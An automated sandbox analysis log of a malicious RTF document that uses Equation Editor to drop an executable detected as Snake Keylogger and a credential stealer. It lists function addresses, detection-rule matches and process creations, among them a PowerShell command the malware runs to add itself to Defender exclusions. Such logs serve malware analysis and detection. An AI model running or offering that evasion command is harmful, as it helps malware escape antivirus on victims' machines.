                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C82A08_2_005C82A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C52A18_2_005C52A1
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EA1208_2_005EA120
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005ED6408_2_005ED640
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EA4408_2_005EA440
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E00408_2_005E0040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EC0608_2_005EC060
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EF2608_2_005EF260
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E00178_2_005E0017
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E30108_2_005E3010
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005ED0008_2_005ED000
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E18288_2_005E1828
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EBA208_2_005EBA20
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EEC208_2_005EEC20
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E34D88_2_005E34D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EE2C08_2_005EE2C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EB0C08_2_005EB0C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E04F88_2_005E04F8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E1CF08_2_005E1CF0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005ECCE08_2_005ECCE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E0E988_2_005E0E98
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E0E878_2_005E0E87
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EAA808_2_005EAA80
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E26808_2_005E2680
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EDC808_2_005EDC80
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EC6A08_2_005EC6A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EF8A08_2_005EF8A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EA7508_2_005EA750
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E2B488_2_005E2B48
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EBD408_2_005EBD40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EEF408_2_005EEF40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EA7608_2_005EA760
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E13608_2_005E1360
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005ED9608_2_005ED960
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E05088_2_005E0508
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EB7008_2_005EB700
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EE9008_2_005EE900
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005ED3208_2_005ED320
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E09D08_2_005E09D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EC9C08_2_005EC9C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EFBC08_2_005EFBC0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E09C18_2_005E09C1
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EE5E08_2_005EE5E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EB3E08_2_005EB3E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EC3808_2_005EC380
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EF5808_2_005EF580
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E21B88_2_005E21B8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EADA08_2_005EADA0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E39A08_2_005E39A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EDFA08_2_005EDFA0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A24A808_2_00A24A80
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A200408_2_00A20040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A298A28_2_00A298A2
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A27EA08_2_00A27EA0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2F2A88_2_00A2F2A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A28BA88_2_00A28BA8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A298B08_2_00A298B0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2AEB08_2_00A2AEB0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2BBB88_2_00A2BBB8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A234B98_2_00A234B9
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2D1808_2_00A2D180
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A264808_2_00A26480
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A257888_2_00A25788
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2DE888_2_00A2DE88
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A271888_2_00A27188
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A264908_2_00A26490
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A271988_2_00A27198
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A28B988_2_00A28B98
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A27E9E8_2_00A27E9E
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A25BE08_2_00A25BE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2E4E08_2_00A2E4E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A268E88_2_00A268E8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A275F08_2_00A275F0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A28FF08_2_00A28FF0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A282F68_2_00A282F6
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A282F88_2_00A282F8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2AEC08_2_00A2AEC0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A241C08_2_00A241C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C8C18_2_00A2C8C1
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A234C88_2_00A234C8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2BBC88_2_00A2BBC8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C8D08_2_00A2C8D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A241D08_2_00A241D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A24ED08_2_00A24ED0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A25BD48_2_00A25BD4
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A24ED88_2_00A24ED8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2D5D88_2_00A2D5D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2FBD88_2_00A2FBD8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A268DC8_2_00A268DC
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C0208_2_00A2C020
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A239208_2_00A23920
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A253208_2_00A25320
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2CD288_2_00A2CD28
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A246288_2_00A24628
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A260288_2_00A26028
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A253308_2_00A25330
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2DA308_2_00A2DA30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A26D308_2_00A26D30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2F7318_2_00A2F731
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A260388_2_00A26038
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A290008_2_00A29000
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A29D088_2_00A29D08
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2B3088_2_00A2B308
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A200128_2_00A20012
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2EE108_2_00A2EE10
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A239108_2_00A23910
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C0108_2_00A2C010
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2B3188_2_00A2B318
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2461C8_2_00A2461C
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2B7608_2_00A2B760
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2AA688_2_00A2AA68
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C4688_2_00A2C468
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A23D698_2_00A23D69
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2B7708_2_00A2B770
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A230708_2_00A23070
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A24A708_2_00A24A70
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A23D788_2_00A23D78
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C4788_2_00A2C478
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2E9788_2_00A2E978
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A257788_2_00A25778
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2DE788_2_00A2DE78
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2F7408_2_00A2F740
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A26D408_2_00A26D40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A27A408_2_00A27A40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A287408_2_00A28740
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A27A488_2_00A27A48
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A294488_2_00A29448
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A287508_2_00A28750
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A294588_2_00A29458
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2AA598_2_00A2AA59
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2305F8_2_00A2305F
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A557B88_2_00A557B8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A549F88_2_00A549F8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A550D88_2_00A550D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A53C388_2_00A53C38
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A543188_2_00A54318
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A52E788_2_00A52E78
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A500408_2_00A50040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A535588_2_00A53558
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A557A88_2_00A557A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A549E98_2_00A549E9
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A529CE8_2_00A529CE
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A550C88_2_00A550C8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A50ED88_2_00A50ED8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A521218_2_00A52121
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A53C288_2_00A53C28
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A521308_2_00A52130
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A52B008_2_00A52B00
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A543088_2_00A54308
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A500148_2_00A50014
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A52E688_2_00A52E68
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A5354A8_2_00A5354A
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A52A508_2_00A52A50
                Source: Xkl0PnD8zFPjfh1.wiz.rtf, type: SAMPLE, Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Xkl0PnD8zFPjfh1[1].exe.2.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wealthcharliebgk.exe.2.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, COVID19.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, VIPSeassion.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, VIPSeassion.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, COVID19.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, VIPSeassion.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, VIPSeassion.cs, Cryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, RMQW4BFBjZuxJDH8DI.cs, Security API names: _0020.SetAccessControl
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, RMQW4BFBjZuxJDH8DI.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, RMQW4BFBjZuxJDH8DI.cs, Security API names: _0020.AddAccessRule
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, V2NTuI83GISjPPYVRb.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, V2NTuI83GISjPPYVRb.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, RMQW4BFBjZuxJDH8DI.cs, Security API names: _0020.SetAccessControl
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, RMQW4BFBjZuxJDH8DI.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, RMQW4BFBjZuxJDH8DI.cs, Security API names: _0020.AddAccessRule
                Source: classification engine, Classification label: mal100.troj.spyw.expl.evad.winRTF@9/14@29/8
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\Desktop\~$l0PnD8zFPjfh1.wiz.rtf
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Mutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\CVR7B47.tmp
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File read: C:\Users\desktop.ini
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, File read: C:\Windows\System32\drivers\etc\hosts
                Source: Xkl0PnD8zFPjfh1.wiz.rtf, ReversingLabs: Detection: 44%
                Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Process created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
